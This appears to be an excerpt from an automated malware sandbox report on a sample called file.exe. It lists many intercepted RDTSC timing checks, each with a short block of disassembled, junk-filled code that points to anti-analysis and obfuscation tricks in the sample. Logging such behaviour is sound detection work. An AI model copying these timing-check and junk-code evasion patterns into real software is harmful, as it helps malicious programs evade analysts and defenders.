Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A25 second address: 2B0A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0B050D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A2F second address: 2B0A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A39 second address: 2B0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F84B0B050E9h 0x0000000c popad 0x0000000d jmp 00007F84B0B050E9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F84B0B050E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A7F second address: 2B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A85 second address: 2B0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A89 second address: 2B0A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A8F second address: 2B0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DD8 second address: 2B7DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DDE second address: 2B7DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DE2 second address: 2B7E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65602h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7978 second address: 2B7985 instructions: 0x00000000 rdtsc 0x00000002 js 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7985 second address: 2B798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AF8 second address: 2B7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AFE second address: 2B7B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F84B0D655F8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7B0B second address: 2B7B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9488 second address: 2B948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C5401 second address: 2C540F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C540F second address: 2C5415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 201AC7 second address: 201ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6C23 second address: 2C6C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C6C27 second address: 2C6C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC766 second address: 2CC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC76C second address: 2CC778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F84B0B050D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CC371 second address: 2CC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B17 second address: 2D8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B1B second address: 2D8B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65603h 0x0000000c jmp 00007F84B0D655FFh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F84B0D655F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D8B4D second address: 2D8B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnp 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1059 second address: 2E1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F84B0D655F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E11C8 second address: 2E11DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84B0B050D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F84B0B050D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E1326 second address: 2E1365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65604h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edi 0x0000000c jmp 00007F84B0D65604h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D655FEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15E0 second address: 2E15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F84B0B050D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15EF second address: 2E15F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E15F5 second address: 2E1600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20C9 second address: 2E20D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F84B0D655F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20D4 second address: 2E20F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jg 00007F84B0B050D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F84B0B050DDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E20F7 second address: 2E20FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7E60 second address: 2E7E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F84B0B050E4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7172 second address: 2F7192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F84B0D65603h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7192 second address: 2F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007F84B0B050DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 307990 second address: 30799A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30781B second address: 307820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 307820 second address: 307837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FCh 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30989F second address: 3098AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324B99 second address: 324B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324B9D second address: 324BA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328CCD second address: 328CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328CD2 second address: 328CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328F63 second address: 328F68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A449 second address: 32A44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A44D second address: 32A465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A465 second address: 32A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A46C second address: 32A492 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D6560Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F84B0D655F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A492 second address: 32A4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A4BA second address: 32A4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BCF8 second address: 32BD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BD0E second address: 32BD18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32DB68 second address: 32DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32DB78 second address: 32DB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jl 00007F84B0D655F6h 0x0000000e jg 00007F84B0D655F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D001B second address: 53D0044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050E5h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0044 second address: 53D0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0049 second address: 53D004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D004F second address: 53D0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0EF5 second address: 53B0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0F04 second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0D655FFh 0x00000009 jmp 00007F84B0D65603h 0x0000000e popfd 0x0000000f mov esi, 454F2EBFh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F84B0D65606h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0E56 second address: 53F0E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0E5C second address: 53F0E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0E60 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F84B0B050E2h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0E85 second address: 53F0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0E89 second address: 53F0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390137 second address: 53901B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, 79077BEDh 0x00000017 mov ah, E9h 0x00000019 popad 0x0000001a push dword ptr [ebp+04h] 0x0000001d jmp 00007F84B0D65605h 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F84B0D65603h 0x0000002e or ax, 0C7Eh 0x00000033 jmp 00007F84B0D65609h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53901B9 second address: 53901BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53901BE second address: 53901D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0B99 second address: 53B0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0B9F second address: 53B0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0BA3 second address: 53B0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F84B0B050E3h 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E8h 0x0000001f sub cx, 8568h 0x00000024 jmp 00007F84B0B050DBh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F84B0B050E6h 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F84B0B050E7h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0C2D second address: 53B0C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F84B0D65605h 0x0000000b sub ah, FFFFFF96h 0x0000000e jmp 00007F84B0D65601h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F84B0D655FAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0671 second address: 53B06D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 42CEF6D0h 0x00000008 mov bh, AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 push edx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F84B0B050E1h 0x0000001d xor ch, 00000006h 0x00000020 jmp 00007F84B0B050E1h 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F84B0B050DEh 0x0000002d sbb ah, FFFFFFA8h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 mov ah, 8Fh 0x00000038 popad 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B06D9 second address: 53B06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0393 second address: 53B03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0B050DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F84B0B050DCh 0x00000017 jmp 00007F84B0B050E5h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F84B0B050DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B03E9 second address: 53B044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F84B0D655FCh 0x00000011 pushad 0x00000012 mov esi, 50DB28E7h 0x00000017 movzx ecx, di 0x0000001a popad 0x0000001b popad 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F84B0D65605h 0x00000024 adc ecx, 7419A006h 0x0000002a jmp 00007F84B0D65601h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0300 second address: 53C0345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 3E8Ah 0x00000007 pushfd 0x00000008 jmp 00007F84B0B050DBh 0x0000000d sbb ax, 9D2Eh 0x00000012 jmp 00007F84B0B050E9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F84B0B050DDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D033C second address: 53D0342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0342 second address: 53D03AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F84B0B050DBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F84B0B050E6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F84B0B050DDh 0x00000020 sbb ah, 00000026h 0x00000023 jmp 00007F84B0B050E1h 0x00000028 popfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B055C second address: 53B0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0561 second address: 53B0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F84B0B050E1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F84B0B050DEh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0590 second address: 53B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0594 second address: 53B059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B059A second address: 53B05C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov ch, dh 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F84B0D655FFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B05C8 second address: 53B05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E4h 0x00000009 rdtsc
